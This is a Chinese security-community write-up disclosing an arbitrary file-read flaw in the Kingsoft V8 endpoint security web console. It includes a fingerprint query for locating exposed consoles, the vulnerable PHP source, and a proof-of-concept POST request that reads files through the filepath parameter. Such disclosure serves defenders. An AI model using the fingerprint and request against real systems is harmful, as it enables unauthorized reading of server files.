奇安信攻防社区-Kingsoft V8 终端安全系统 get_file

Kingsoft V8 终端安全系统 get_file_content.php 任意文件读取漏洞

# Kingsoft V8 终端安全系统 get_file_content.php 任意文件读取漏洞 ## 漏洞描述 Kingsoft V8 终端安全系统存在任意文件读取漏洞，攻击者可以通过漏洞下载服务器任意文件 ## 漏洞影...

Kingsoft V8 终端安全系统 get\_file\_content.php 任意文件读取漏洞
==================================================

漏洞描述
----

Kingsoft V8 终端安全系统 存在任意文件读取漏洞，攻击者可以通过漏洞下载服务器任意文件

漏洞影响
----

Kingsoft V8 终端安全系统

网络测绘
----

title="在线安装-V8+终端安全系统Web控制台"

漏洞复现
----

登录页面

![img](https://shs3.b.qianxin.com/butian_public/f698311d8193610cfe1bb6f82c325bb9303512d62e391.jpg)

存在漏洞的文件`/Console/receive_file/get_file_content.php`

```php
<?php  
  if(stripos($_POST['filepath'],"..") !== false) {
    echo 'no file founggd';
    exit();
  }
  ini_set("open_basedir", "../");
  $file_path = '../'.iconv("utf-8","gb2312",$_POST['filepath']);
  if(!file_exists($file_path)){
    echo 'no file founggd';
    exit();
  }

$fp=fopen($file_path,"r");  
  $file_size=filesize($file_path);

$buffer=5024;  
  $file_count=0;

while(!feof($fp) && $file_count<$file_size){  
    $file_con=fread($fp,$buffer);  
    $file_count+=$buffer;  
    echo $file_con;  
  }  
  fclose($fp);  
?>
```

文件中没有任何的过滤 通过 filepaht 参数即可下载任意文件

由于不能出现 .. ，所以只能读取web目录下的文件

```plain
POST /receive_file/get_file_content.php

filepath=login.php
```

![img](https://shs3.b.qianxin.com/butian_public/f5638025f0924f83d9477c519b69e94876937b1b09af6.jpg)

发表于 2024-07-12 18:46:17
阅读 ( 659 )
分类：Web应用

Kingsoft V8 终端安全系统 get_file_content.php 任意文件读取漏洞

0 条评论